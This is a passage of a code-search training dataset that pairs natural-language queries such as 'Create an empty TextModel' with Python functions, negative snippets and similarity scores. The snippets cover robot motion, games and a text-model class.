'Z': (0, 2, -1)\n }\n\n for m in ms:\n if m == '#':\n # End the scramble if '#' is found.\n self.scrambling = False\n else:\n axis, slice, dir = mmap[m[0].upper()]\n if \"'\" in m:\n # Invert the move.\n self.anims.add(Anim(self, axis, slice, -dir, self.speed))\n m = m.replace(\"'\", '')\n elif '2' in m:\n # Double the move.\n self.anims.add(Anim(self, axis, slice, dir, self.speed), Anim(self, axis, slice, dir, self.speed))\n else:\n self.anims.add(Anim(self, axis, slice, dir, self.speed))\n m = m + \"'\"\n\n # Push inverse move to history queue.\n self.moved.push(m)", "def setSpeed(self, rpm):\n self.delayLength = 30.0/(self.totalSteps*rpm)", "def example_move(self):\n self.right() # start rotating right\n time.sleep(1) # turn for a second\n self.stop() # stop\n self.servo(1000) # look right\n time.sleep(.25) # give your head time to move\n self.servo(2000) # look left", "def example_move(self):\n self.right() # start rotating right\n time.sleep(1) # turn for a second\n self.stop() # stop\n self.servo(1000) # look right\n time.sleep(.25) # give your head time to move\n self.servo(2000) # look left", "def increase_speed(self):\n self.ship_speed_factor *= self.speed_up_scale\n self.bullet_speed_factor *= self.speed_up_scale\n self.alien_speed_factor *= self.speed_up_scale", "def scenario1(height, speed):\n time = math.sqrt((2 * height) / 9.81)\n result = speed * time\n return result", "def move_car(self, linear_speed, angular_speed, epsilon=0.05, update_rate=10, min_laser_distance=-1):\n cmd_vel_value = Twist() # Describes linear motion and angular motion of robot\n cmd_vel_value.linear.x = linear_speed\n cmd_vel_value.angular.z = angular_speed\n rospy.logwarn(\"CATVehicle Base Twist Cmd>>\" + str(cmd_vel_value))\n self._check_publishers_connection()\n self._cmd_vel_pub.publish(cmd_vel_value)\n time.sleep(0.01) # This is the timespan per timestep?\n #time.sleep(0.02)\n \n \"\"\" # Implement this later?\n self.wait_until_twist_achieved(cmd_vel_value,\n epsilon,\n update_rate,\n min_laser_distance)\n \"\"\"", "def _update_speed(self, speed):\n if speed is None:\n return\n if speed == self._current_speed:\n return\n\n 
self._current_speed = speed\n self._update_speed_attributes()\n LOG.info(\n f\"Updated LUNOS {self._name}: {self.percentage}% {self._current_speed}\"\n )", "def move(self, speed=1):\n self.set_motor(self.left_motor, 'left', speed)\n self.set_motor(self.right_motor, 'right', speed)\n time.sleep(0.5)", "def main():\n moveList = ('R4, R3, L3, L2, L1, R1, L1, R2, R3, L5, L5, R4, L4, R2, R4, '\n 'L3, R3, L3, R3, R4, R2, L1, R2, L3, L2, L1, R3, R5, L1, L4, '\n 'R2, L4, R3, R1, R2, L5, R2, L189, R5, L5, R52, R3, L1, R4, '\n 'R5, R1, R4, L1, L3, R2, L2, L3, R4, R3, L2, L5, R4, R5, L2, '\n 'R2, L1, L3, R3, L4, R4, R5, L1, L1, R3, L5, L2, R76, R2, R2, '\n 'L1, L3, R189, L3, L4, L1, L3, R5, R4, L1, R1, L1, L1, R2, '\n 'L4, R2, L5, L5, L5, R2, L4, L5, R4, R4, R5, L5, R3, L1, L3, '\n 'L1, L1, L3, L4, R5, L3, R5, R3, R3, L5, L5, R3, R4, L3, R3, '\n 'R1, R3, R2, R2, L1, R1, L3, L3, L3, L1, R2, L1, R4, R4, L1, '\n 'L1, R3, R3, R4, R1, L5, L2, R2, R3, R2, L3, R4, L5, R1, R4, '\n 'R5, R4, L4, R1, L3, R1, R3, L2, L3, R1, L2, R3, L3, L1, L3, '\n 'R4, L4, L5, R3, R5, R4, R1, L2, R3, R5, L5, L4, L1, L1')\n moveList = moveList.replace(' ', '').split(',')\n\n elf = Path()\n\n for move in moveList:\n start = [elf.x, elf.y]\n print('Elf turning {} and walking for {} steps.').format(\n move[0], move[1:])\n elf.move(move[0], move[1:])\n end = [elf.x, elf.y]\n if(addMoveToList(elf, start, end)):\n break\n print('Elf ended in position {},{}').format(elf.x, elf.y)\n print('Shortest distance from origin to EB HQ is: {}').format(\n abs(elf.x) + abs(elf.y))", "def _validate_speed(self, speed: pint.Quantity | None) -> str:\n # Validated speeds are used as command argument, with empty string being the default for None\n if speed is None:\n return \"\"\n\n # Alert if out of bounds but don't raise exceptions, according to general philosophy.\n # Target flow rate too high\n if speed < ureg.Quantity(\"2 sec/stroke\"):\n speed = ureg.Quantity(\"2 sec/stroke\")\n warnings.warn(\n f\"Desired speed ({speed}) is unachievable!\"\n f\"Set to {self._seconds_per_stroke_to_flowrate(speed)}\"\n f\"Wrong units? A bigger syringe is needed?\"\n )\n\n # Target flow rate too low\n if speed > ureg.Quantity(\"3692 sec/stroke\"):\n speed = ureg.Quantity(\"3692 sec/stroke\")\n warnings.warn(\n f\"Desired speed ({speed}) is unachievable!\"\n f\"Set to {self._seconds_per_stroke_to_flowrate(speed)}\"\n f\"Wrong units? A smaller syringe is needed?\"\n )\n\n return str(round(speed.m_as(\"sec / stroke\")))", "def wheel(text, func, args):\n animation = \"|/-\\\\\"\n idx = 0\n thread = Thread(target=func, args=args)\n thread.start()\n while thread.join(0.1) or thread.isAlive():\n print(Fore.WHITE + text + \" \" + animation[idx % len(animation)], end=\"\\r\")\n idx += 1", "def set_speed(self,value):\n if (value>self.get_max_speed()):\n print \"asked to set the speed to %f but the max speed is %f\\n\" % (value,self.get_max_speed())\n else:\n return self.put_par(\"slew_speed\",value)", "def use_normal_speed(self):\n command = _build_robovac_command(RobovacModes.SET_SPEED, RobovacCommands.SLOW_SPEED)\n message = self._build_command_user_data_message(command)\n\n self._send_packet(message, False)" ]
[ "0.6296124", "0.6269911", "0.6195199", "0.61470234", "0.6099951", "0.6089762", "0.6049702", "0.6044615", "0.6016867", "0.5855935", "0.58457875", "0.5815366", "0.5801311", "0.5796839", "0.5796374", "0.57753795", "0.57381445", "0.5728528", "0.57273424", "0.57228905", "0.5700719", "0.5700719", "0.5695538", "0.5690546", "0.5664009", "0.5658058", "0.5646326", "0.56377226", "0.5622351", "0.5612868", "0.56041074", "0.55974925", "0.55471134", "0.55283546", "0.5522026", "0.5509901", "0.54995036", "0.54619974", "0.5452868", "0.54459524", "0.5425512", "0.5423365", "0.5419042", "0.54095817", "0.54095817", "0.54060346", "0.5392781", "0.53910226", "0.53877926", "0.5384184", "0.5364533", "0.53571814", "0.53535056", "0.5350742", "0.5346358", "0.5341502", "0.5338661", "0.5332979", "0.53325087", "0.53324497", "0.53245145", "0.5323732", "0.5315173", "0.53078836", "0.5305938", "0.52980566", "0.5291466", "0.52844733", "0.5283922", "0.52826995", "0.5274159", "0.5264728", "0.5251199", "0.5245984", "0.5244961", "0.5236726", "0.5227664", "0.52192193", "0.5217354", "0.5209577", "0.5208714", "0.5206564", "0.52058077", "0.5201316", "0.52007407", "0.51989317", "0.5197276", "0.51803076", "0.5173018", "0.5168329", "0.5168329", "0.5165849", "0.51591927", "0.51564807", "0.51562536", "0.5146226", "0.51369894", "0.51365787", "0.51282793", "0.5122189", "0.51187867" ]
0.0
-1
Create an empty TextModel.
def __init__(self):
    #
    # Create dictionaries for each characteristic
    #
    self.words = {}            # For counting words
    self.wordlengths = {}      # For counting word lengths
    self.stems = {}            # For counting stems
    self.sentencelengths = {}  # For counting sentence lengths
    #
    # Create another of your own
    #
    self.gerund = {}           # For counting words with ing
    self.text = ''
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_model(self):\n self.model = None\n pass", "def __init__(self, text=None, model=None, voice_test_kind=None): # noqa: E501 # noqa: E501\n\n self._text = None\n self._model = None\n self._voice_test_kind = None\n self.discriminator = None\n\n self.text = text\n self.model = model\n self.voice_test_kind = voice_test_kind", "def create_model(self):\n pass", "def create_model(self):\n pass", "def create_model(self):\n self.create_model_file()\n self.create_model_unit_test()\n self.add_model_to_list()\n self.readme_reminder()", "def empty_model() -> Model:\n yield Model()", "def create_model(self):\n model = solph.Model(self.es)\n return model", "def build_model(self, text, n = 3):\n \n try:\n self.lm.build_model(text,n)\n except:\n raise\n \n self.vocab = Counter(words(text))\n\n return self.lm", "def createModel(self, sid=\"\"):\n return _libsbml.SBMLDocument_createModel(self, sid)", "def test_nullable_text(self):\r\n entity = NullableTextModel(text=None)\r\n entity.save()\r\n\r\n db_entity = NullableTextModel.objects.get()\r\n self.assertEquals(db_entity.text, None)", "def MakeModel(self):\n pass", "def build_model(self, text):\n text = '< ' * (self.n - 1) + text.replace(' . ', ' .%s ' % (' <' * (self.n - 1))) + ' >'\n tokens = self.split(text)\n self.corpus_len = len(tokens)\n self.n_grams_by_len = [{} for _ in range(self.n)]\n for i in range(len(tokens)): # for index in tokens\n for n in range(self.n): # for n-gram size from 1 to n:\n if i >= n: # if the index has advanced enough for this n\n n_gram = self.join(tokens[i - n: i + 1])\n n_grams = self.n_grams_by_len[n] # get dict for respective n\n n_grams[n_gram] = n_grams.get(n_gram, 0) + 1 # get dict for respective n\n return self.get_model()", "def __init__(self, tokenizer, model, text=None, **kwargs):\n self.tokenizer = tokenizer\n self.model = model\n self.model.eval() # deactivate DropOut modules to have reproducible results during evaluation\n self.model.to(self.device)\n self.input_text = text\n self._clear_results()\n self.alpha = kwargs.get('alpha', 1)", "def test_default_text(self) -> None:\n item = Item()\n self.assertEqual(item.text, \"\")", "def empty(model, inplace=False):\n\n return Environment.from_defaults(model, max_uptake=0, max_secretion=None, inplace=inplace)", "def __init__(self):\n self.text = ''", "def create_model(self) -> None:\n self._model = create_model_with_temperature_scaling(self.config)", "def __init__(self, *args):\n this = _libsbml.new_ModelCreator(*args)\n try: self.this.append(this)\n except: self.this = this", "def _get_and_build_text_structure(self):\n return Text_structure(self.filename, self)", "def create_model(self, **inputs):\n raise NotImplementedError('This method has to be overwritten.')", "def basic_model_init(model_args, task_infos, tokenizer):\n config = AutoConfig.from_pretrained(\n model_args.model_name_or_path,\n num_labels=task_infos.num_labels,\n cache_dir=model_args.model_cache_dir,\n id2label=task_infos.id2label,\n label2id=task_infos.label2id,\n )\n model_cls = getattr(mod, model_args.architectures,\n AutoModelForSequenceClassification)\n model = model_cls.from_pretrained(\n model_args.model_name_or_path,\n config=config,\n cache_dir=model_args.model_cache_dir,\n )\n if model.config.vocab_size < len(tokenizer):\n print(\"resize...\")\n model.resize_token_embeddings(len(tokenizer))\n return model", "def __init__(self, model_name):\r\n self.name = model_name\r\n self.words = ({})\r\n self.word_lengths = ({})\r\n self.stems = ({})\r\n self.sentence_lengths = ({})\r\n 
self.punctuation = ({})", "def __init__(self, text):\n\n self.text = text", "def fasttext_model(\n sentences, size=100, min_count=5, negative=5, window=5,\n cbow=True, iterations=5, seed=0, workers=1):\n cbow = 0 if cbow == 1 else 1\n model = FastText(\n sentences, size=size, min_count=min_count,\n negative=negative, window=window, sg=cbow, iter=iterations,\n seed=seed, workers=workers)\n\n return model", "def __init__(self, *args):\n this = _libsbml.new_Model(*args)\n try: self.this.append(this)\n except: self.this = this", "def test_create_text_index_noschema(self):\n actual = self.engine._create_text_index()\n expected = 'TextIndex'\n self.assertEqual(actual, expected)", "def __init__(self, model):\n super().__init__()\n\n # declare model\n self._model = model\n\n self._textBox = QTextEdit(self)\n\n self._executeButton = QPushButton(\"Execute!\", self)\n # self._userBox = QLineEdit(self)\n # self._frameTextLabel = QLabel(\"Frame Number: %s\" % (None), self)", "def test_create_without_translation(self):\n x = NotRequiredModel()\n\n self.assertNumQueries(1, lambda: x.save()) # only master object created\n self.assertEqual(sorted(x.get_available_languages()), [])", "def initialize_model(self):\n pass", "def __init__(self, text):\n self.text = text", "def __init__(self, text):\n self.text = text", "def text_to_instance(self, text_label: list):\n label = LabelField(\n self.label_to_idx[text_label[0]], skip_indexing=True\n )\n tokens = [Token(token) for token in text_label[1].split()]\n sentence_field = TextField(tokens, self.token_indexers)\n\n fields = {\"sentence\": sentence_field, \"labels\": label}\n return Instance(fields)", "def fasttext_model(sentences, size=100, min_count=5, window=5, negative=5,\r\n cbow=True, iterations=5, seed=0, workers=1):\r\n return FastText(sentences, size=size, min_count=min_count, window=window,\r\n negative=negative, sg=not cbow, iter=iterations,\r\n seed=seed, workers=workers)", "def test_create_model(self):\n model = ControlledSchema.create_model(self.engine, self.repos, declarative=False)\n self.assertTrue(isinstance(model, six.string_types))\n\n model = ControlledSchema.create_model(self.engine, self.repos.path, declarative=True)\n self.assertTrue(isinstance(model, six.string_types))", "def train_and_generate(text_path):\n\n print(\"\\n------------------ ff.io Parameters ------------------\")\n print(f\"Generate text length: {text_length}\")\n print(f\"Sequence length: {seq_length}\\n\")\n print(f\"{layers_count} layers with dimension {layers_dim}\")\n print(f\"{epoch_num} epochs with batch size {batch_s}\\n\")\n\n text = read_text(text_path)\n\n if load_model:\n print(\"Loading model from file.\")\n\n if model_type == 'word':\n print(\"Creating word maps.\")\n characters, n_to_char, char_to_n = word_map(text)\n \n else: # Default to character maps\n print(\"Creating character maps.\")\n characters, n_to_char, char_to_n = character_map(text)\n\n if seed_text:\n seed_text_str = read_text(seed_text_filepath)\n\n print(\"Processing text.\")\n X, Y, characters, n_to_char = process_text(text, characters, n_to_char, char_to_n)\n\n print(\"Modelling\\n\")\n mod = model(X, Y, characters)\n\n gen_text = generate_text(mod, text_length, text, X, characters, n_to_char, char_to_n, seed_text_str = seed_text_str)\n\n return gen_text", "def _create_string_input_trainable_model():\n\n class BlockWithStringInputs(onnxblock.ForwardBlock):\n def __init__(self):\n super().__init__()\n self.cast = onnxblock.blocks.Cast(to=onnx.TensorProto.FLOAT)\n self.linear = 
onnxblock.blocks.Linear(4, 2)\n\n def build(self, string_input):\n return self.linear(self.cast(string_input))\n\n string_block = BlockWithStringInputs()\n with onnxblock.empty_base() as model_accessor:\n model_accessor.model.graph.input.extend(\n [\n onnx.helper.make_tensor_value_info(\"input\", onnx.TensorProto.STRING, [1, 4]),\n ]\n )\n _ = string_block(\"input\")\n\n return string_block.to_model_proto()", "def test_empty_model(self):\n\n class Foo(Model):\n pass\n\n assert hasattr(Foo, \"_fields\")\n assert type(Foo._fields) is dict\n assert len(Foo._fields.items()) == 0", "def __init__(self, text, no_ne_label = 'O'):\n # Adding re.UNICODE with \\s gets rid of some stupid special unicode whitespaces\n # That's neccessary, because otherwise the stanford POS tagger will split words at\n # these whitespaces and then the POS sequences have different lengths from the\n # token sequences\n text = re.sub(r\"[\\t\\s]+\", \" \", text, flags=re.UNICODE)\n tokens_str = [token_str.strip() for token_str in text.strip().split(\" \")]\n self.tokens = [Token(token_str) for token_str in tokens_str if len(token_str) > 0]\n self.no_ne_label = no_ne_label", "def test_constructor_None(self):\n structure = MultiLingualTextStructure(None, use_default_for_empty=True)\n self.assertEqual(structure[\"nb\"], \"\")\n self.assertEqual(structure[\"en\"], \"\")", "def create_tweet(model):\n return model.make_short_sentence(140, init_state=None)", "def __init__(self,\n text: str) -> None:\n\n super().__init__(text)", "def init_model(self):\n pass", "def process_text(model_name: str, text: str) -> spacy.tokens.Doc:\r\n nlp = load_model(model_name)\r\n return nlp(text)", "def create(self) -> tf.keras.models.Model:\n raise NotImplementedError()", "def __init__(self, model_name):\n\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.stems={}\n self.sentence_lengths={}\n self.endings={}\n self.total = 0", "def create_model(self):\r\n model = self.model_fn(self.flags)\r\n print(model)\r\n return model", "def _create_model(self, key):\n pass", "def make_model():\n m = model_class(*argv[2:-1])\n modelobj[\"model\"] = m", "def __init__(self, model_name):\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.stems = {}\n self.sentence_lengths = {}\n self.punctuation = {}", "def create_train_model(self):\n st = LancasterStemmer()\n with open(self.data_path, encoding='utf8') as f_name:\n sentences = [[st.stem(w) for w, t in pos_tag(line.lower().split()) if 'N' in t] for line in f_name]\n sentences = [filter(lambda x: len(x) > 2, (word.strip(punctuation) for word in sentences)) for sent in sentences]\n model = Word2Vec(sentences,\n min_count=self.min_count,\n size=self.size,\n window=self.window,\n workers=4)\n model.save(self.model_path)", "def test_phrase_create(self):\n tokens = ['this', 'is', 'a', 'test', 'phrase']\n entities = [\n Entity('this', 'who', I('this'), 0, 1),\n Entity('phrase', 'what', I('phrase'), 4, 5)]\n relations = [Relation(entities, confidence=1.0)]\n phrase = Phrase(tokens, relations, 1, 1)\n expected = '<Blank> (who) is a test (what) <Blank>'\n self.assertEqual(phrase.to_string(), expected)", "def compute_model_for_text(text, model_type=MODEL_3_GRAMS, clean_method=norm.CLEAN_TWEET):\n\n # validating model type\n if model_type not in model_generator_mapper:\n raise Exception('Unknown model type received.')\n\n # validating cleaning method\n if clean_method not in norm.clean_text_method_mapper:\n raise Exception('Unknown text cleaning method received.')\n\n # 
building the model for the data set just created\n model_features = compute_model_from_data_set([text], model_type, clean_method)\n\n # returning the model features\n return model_features", "def __init__(self, model_name):\n self.name = model_name\n self.words = {}\n self.word_lengths = {}\n self.sentence_lengths = {}\n self.stems = {}\n self.commas_per_sentence = {}", "def test_create_with_default_attributes(self):\n\n x = NotRequiredModel()\n x.tr_title = \"DEFAULT_TRANS_TITLE\"\n\n self.assertNumQueries(2, lambda: x.save()) # master and translation object created\n self.assertEqual(sorted(x.get_available_languages()), [self.conf_fallback])", "def new(self):\n\n self.obj = self.factory()\n\n if self.textproperty is None:\n self.attributes = ElementHandler.load_definitions(self, self.obj)", "def load_fasttext_format(cls, model_file, encoding='utf8'):\n model = cls()\n if not model_file.endswith('.bin'):\n model_file += '.bin'\n model.file_name = model_file\n model.load_binary_data(encoding=encoding)\n return model", "def model() -> Model:\n return Model()", "def __init__(self, text: Union[str, Text, None] = None):\n if isinstance(text, str):\n text = TNTParser().parse(text)\n if text is not None:\n self.text = text", "def build_model(self , text, n=3): #should be called build_model\n self.n = n\n self.vocab = Counter(words(text))\n\n tokens=tokenize(text)\n for gram in list(ngrams(tokens,self.n)):\n self.lm_dict[tuple(gram[:-1])][gram[-1]]+=1", "def generate_from_text(self, text):\n words = self.process_text(text)\n self.generate_from_frequencies(words)\n return self", "def createModel(self, X_train, y_train):\n total_words = len(self.tokenizer.word_index) + 1\n # Create model and layers\n model = Sequential()\n model.add(Embedding(total_words, 100, input_length=self.max_sequence_len-1))\n model.add(Bidirectional(LSTM(150)))\n model.add(Dense(total_words, activation=\"softmax\"))\n # Compile model\n model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=0.01), metrics=['accuracy'])\n # Fit model to training data\n fitting = model.fit(X_train, y_train, epochs=100, verbose=1, callbacks=[self.callback])\n return model", "def __init__(self):\n self.model = None", "def __init__(self):\n self.model = None", "def __init__(self, type_=None, text=None, ssml=None):\n default_attr = dict(type=str(),\n text=str(),\n ssml=str())\n self.type = type_\n self.text = text\n self.ssml = ssml\n self._set_default_attr(default_attr)", "def test_text_classifier_create(self):\n pass", "def create_models( self ):", "def EmptyStringField(**kwargs: Any) -> Any:\n return Field(\"\", **kwargs)", "def test_text_default(self):\n r = Review()\n self.assertEqual(\"\", r.text)", "def _create_model(self):\n\n model_formula = self.get_model_formula()\n\n removed_observation_index = self._model_dataset.index.isin(self._excluded_observations)\n\n # TODO: Handle error that occurs when all model observations are invalid\n model = smf.ols(model_formula,\n data=self._model_dataset,\n subset=~removed_observation_index,\n missing='drop')\n\n self._model = model", "def fit(self, text):\n\n with open('forward_ngram_model.pkl', 'rb') as fin:\n self.forward_model = pickle.load(fin)\n\n with open('backward_ngram_model.pkl', 'rb') as fin:\n self.backward_model= pickle.load(fin)", "def __init__(self, model: Optional[Model] = None) -> None:\n self.model = model", "def build_model(self):\n doc_input = Input(shape=(self.max_sent_num ,self.max_sent_length,512), dtype='float32')\n doc_in=Flatten()(doc_input)\n \n 
#masked3=Masking(mask_value=Special_value)(doc_input)\n \n # self.model_sent = self.build_sent_encoder()\n \n # doc_encoder= TimeDistributed(self.model_sent)(doc_in)\n \n # document_att= self.build_doc_encoder(doc_encoder)\n dense= Dense(DENSE_SIZE,activation='softmax')(doc_in)\n #doc_att = self.build_sent_encoder(sent_encoder)\n # dense the output to 2 because the result is a binary classification.\n output_tensor = Dense(3, activation='softmax', name='classification')(dense)\n # Create Sentence-level Model\n self.model = Model(doc_input, output_tensor)", "def create_new_model(\n self, content: Optional[Dict[str, Any]], model_name: str, columns_sql: Sequence[str]\n ) -> Dict[str, Any]:\n logger.info(f\"The model '{model_name}' has not been documented yet. Creating a new entry.\")\n columns = []\n for column_sql in columns_sql:\n description = self.get_column_description_from_dbt_definitions(column_sql)\n columns.append({\"name\": column_sql, \"description\": description})\n model = {\n \"name\": model_name,\n \"description\": MODEL_NOT_DOCUMENTED,\n \"columns\": columns,\n }\n if not content:\n content = {\"version\": 2, \"models\": [model]}\n else:\n content[\"models\"].append(model)\n return content", "def CreateModel(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def create_model_uniform(text: str) -> List[str]:\n return str.split(text)", "def __call__(self, string):\n return Text(string, self)", "def __init__(self, name:str, model_path:str, \n disabled:List[str]=[\"parser\", \"tagger\", \"lemmatizer\", \"attribute_ruler\"]):\n \n super(ModelAnnotator, self).__init__(name)\n self.model = spacy.load(model_path, disable=disabled)", "def create_task(text):\n new_task = Tasks(task_text=text) \n new_task.save()", "def text_plot(self):\n if self.stext is not None:\n # Create text object :\n self.stextmesh = visu.Text(text=self.stext, color=self.stextcolor,\n font_size=self.stextsize, pos=self.xyz,\n bold=True, name='SourcesText')\n\n # Set text texture :\n self.stextmesh.set_gl_state('translucent', depth_test=True)\n\n # Apply a transformation to text elements to not cover sources :\n self.stextmesh.transform = vist.STTransform(\n translate=self.stextshift)\n else:\n self.stextmesh = visu.Text(name='NoneText')", "def create(self, text):\r\n self.require_collection()\r\n request = http.Request('POST', self.get_url(), self.wrap_object(text))\r\n\r\n return request, parsers.parse_json", "def insert():\n new_text = request.json\n text = TextModel(new_text)\n text.validate()\n unique_fields = [{\"key\"}]\n repository.insert_one_unique_fields(COLLECTION_NAME, text.to_dict(), unique_fields)\n return {\"message\": \"success!\"}, 201", "def create_model(self, data):\n model = nodeitemmodel.NodeItemModel(self.parent.nodedatamanager)\n root = model.invisibleRootItem()\n for attr, value in data.iteritems():\n # components will be initialized separately later\n if attr == 'components':\n self.init_row(model, attr, None, root)\n else:\n self.init_row(model, attr, value, root)\n # end for attr, value in data.iteritems()\n return model", "def create_new_text(self, *args, **kw):\n shape_id = self._create('text', args, kw)\n self.variables.shape_ids.append(shape_id)\n canvas_coords = args[0]\n self.variables.vector_objects[str(shape_id)] = VectorObject(SHAPE_TYPES.TEXT, None)\n self.variables.shape_ids.append(shape_id)\n self.set_shape_pixel_coords_from_canvas_coords(shape_id, canvas_coords)\n self.variables.current_shape_id = shape_id\n return shape_id", "def 
model(self):\n self.add_file_string('Model file')\n self.make_dangerous('Model file')", "def __init__(self, model: str, **kwargs):\n super().__init__(model=model)", "def text_to_instance(self, tokens: List[Token], tags: List[SequenceLabelField] = None) -> Instance:\n\n sentence_field = TextField(tokens, self.token_indexers)\n fields = {'sentence' : sentence_field}\n\n if tags:\n tag_field = SequenceLabelField(labels=tags, sequence_field=sentence_field)\n fields['labels'] = tag_field\n\n return Instance(fields)", "def create_model(self, todolist):\n\t\tstore = gtk.ListStore(int, str)\n\n\t\tfor todo in todolist:\n\t\t\tnew_row = (todo.id, todo.text)\n\t\t\tprint new_row\n\t\t\tstore.append(new_row)\n\n\t\treturn store", "def test_create_nontar_model():\n current_folder = os.path.dirname(os.path.realpath(__file__))\n misc_folder = os.path.join(current_folder, \"misc\")\n model_file = os.path.join(misc_folder, \"model-nonexistent.bla\")\n create.main(\"mlp\", \"10:12:8\", model_file)\n # TODO: Check if error was logged", "def createModel(self):\n model_psp = self.getModelPsp()\n\n if not model_psp:\n log_func.warning(u'Not define model in <%s : %s>' % (self.getName(), self.getType()))\n return None\n\n model_name = self.newPassport().setAsStr(model_psp).name\n\n scheme = self.getScheme()\n if scheme:\n return scheme.getModel(model_name)\n else:\n log_func.warning(u'Error create data scheme object')\n return None", "def create(\n cls,\n config: Dict[Text, Any],\n model_storage: ModelStorage,\n resource: Resource,\n execution_context: ExecutionContext,\n ) -> WhitespaceTokenizer:\n # Path to the dictionaries on the local filesystem.\n return cls(config)", "def mytext(x,y,s,**kwargs):\n # we take care of this one\n model = kwargs.pop('model', None)\n if model:\n th = text(x,y,model,**kwargs)\n draw()\n x0,y0,w,h = th.get_window_extent().bounds\n gca().texts.remove(th)\n x = x0\n y = y0\n kwargs['transform'] = matplotlib.transforms.IdentityTransform()\n kwargs['horizontalalignment'] = 'left'\n kwargs['verticalalignment'] = 'baseline'\n# print x,y,kwargs\n return text(x,y,s,**kwargs)", "def newTestTxt(self):\n self.newTab( extension = TestTxt.TYPE, repoDest=UCI.REPO_UNDEFINED )", "def create_model(session, forward_only):\n print(FLAGS.en_vocab_size, FLAGS.fr_vocab_size)\n model = seq2seq_model.Seq2SeqModel(\n FLAGS.en_vocab_size, FLAGS.fr_vocab_size, _buckets,\n FLAGS.size, FLAGS.num_layers, FLAGS.max_gradient_norm, FLAGS.batch_size,\n FLAGS.learning_rate, FLAGS.learning_rate_decay_factor, use_lstm=True,\n forward_only=forward_only)\n ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)\n if ckpt and tf.gfile.Exists(ckpt.model_checkpoint_path):\n print(\"{} : Reading model parameters from {}\".format(\n datetime.now().ctime(), ckpt.model_checkpoint_path))\n model.saver.restore(session, ckpt.model_checkpoint_path)\n else:\n print(\"{} : Created model with fresh parameters.\".format(\n datetime.now().ctime()))\n session.run(tf.initialize_all_variables())\n return model", "def initialize_model(self):\n model = self.model_class()\n return model", "def get_or_create(cls, text):\n h = sha256(text).hexdigest()[:32]\n planet = TextPlanet.query.get(h)\n\n if planet is None:\n app.logger.info(\"Storing new text\")\n planet = TextPlanet(\n id=h,\n text=text)\n\n return planet", "def test_invalid_text_input(self):\n m = Message(\n text=None, user_id=self.uid\n )\n db.session.add(m)\n with self.assertRaises(exc.IntegrityError) as context:\n db.session.commit()", "def main():\n if args.file and not 
args.nomodel:\n text = read_file(args.file)\n trained_model = train_char_model(text, args.prev)\n save_model(trained_model, args.file)\n sys.exit()\n if args.model:\n trained_model = load_model(args.model)\n if args.nomodel and args.file:\n trained_model = train_char_model(read_file(args.file), args.prev)\n # generate some random text\n history = check_history(trained_model, args.prev)\n gentext = generate_text(trained_model, history, args.gen)\n print(gentext)", "def __init__(self, file_path):\n\n\t\tsuper(Text, self).__init__()\n\n\t\tself.open_file_path(file_path)\n\t\tself.preprocess_raw_text()\n\t\tself.concatenate_processed_text()\n\t\tself.generate_list_of_words()\n\n\t\tself.name = split(file_path)[-1]", "def init_model(session, model):\n # If there is a checkpoint, load it\n if not tf.gfile.Exists(FLAGS.train_dir):\n tf.gfile.MkDir(FLAGS.train_dir)\n ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)\n if ckpt and tf.train.checkpoint_exists(ckpt.model_checkpoint_path):\n print(\"Reading model parameters from %s\" % ckpt.model_checkpoint_path)\n model.saver.restore(session, ckpt.model_checkpoint_path)\n\n # Else initialize the variables\n else:\n if FLAGS.decode:\n input(\"You sure you want to talk to an untrained chatbot? Press Ctrl-C to stop, Return to continue \")\n print(\"Fine.\")\n\n print(\"Creating model with fresh parameters.\")\n session.run(tf.global_variables_initializer())", "def test_empty_model(self):\n x = EmptyModel()\n x.set_current_language(\"en\", initialize=True)\n x.set_current_language(\"fr\", initialize=True)\n x.set_current_language(\"es\")\n x.set_current_language(\"nl\", initialize=True)\n x.save()\n\n self.assertEqual(sorted(x.get_available_languages()), [\"en\", \"fr\", \"nl\"])", "def initialize(self, model):\n pass" ]
[ "0.6320198", "0.6107785", "0.59958667", "0.59958667", "0.59898424", "0.5779712", "0.5769155", "0.569185", "0.56886506", "0.5644959", "0.5625166", "0.55378115", "0.55203444", "0.5467053", "0.54275054", "0.5417462", "0.5403038", "0.5393681", "0.5377207", "0.5369345", "0.5360774", "0.53478116", "0.53204674", "0.5310034", "0.53045213", "0.53009707", "0.52982545", "0.5293802", "0.52734685", "0.5258427", "0.5258427", "0.52521527", "0.52484924", "0.52391577", "0.52381766", "0.52239704", "0.5210568", "0.5210242", "0.52047676", "0.52022636", "0.52011967", "0.51801765", "0.5176298", "0.51755404", "0.51748306", "0.5171819", "0.51682603", "0.5163592", "0.51573503", "0.5153422", "0.51503015", "0.51281226", "0.5127772", "0.5123486", "0.5113629", "0.5106172", "0.5101882", "0.50943476", "0.5091639", "0.5085245", "0.5079829", "0.5077645", "0.5077645", "0.50728315", "0.5065944", "0.50428015", "0.5017555", "0.50163674", "0.5007837", "0.50009334", "0.49973464", "0.49935126", "0.49905574", "0.49873638", "0.49845296", "0.49837598", "0.49830893", "0.49768186", "0.49644637", "0.49525657", "0.49521196", "0.49517003", "0.49376348", "0.49374896", "0.49225143", "0.49144992", "0.49080205", "0.49067575", "0.49052018", "0.4891445", "0.48855555", "0.48814932", "0.48789403", "0.4877627", "0.48679635", "0.48676088", "0.4860968", "0.48591352", "0.4857204", "0.4846262", "0.48382613" ]
0.0
-1
Display the contents of a TextModel.
def __repr__(self):
    s = 'Words:\n' + str(self.words) + '\n\n'
    s += 'Word lengths:\n' + str(self.wordlengths) + '\n\n'
    s += 'Stems:\n' + str(self.stems) + '\n\n'
    s += 'Sentence lengths:\n' + str(self.sentencelengths) + '\n\n'
    s += 'Gerunds:\n' + str(self.gerund)
    return s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
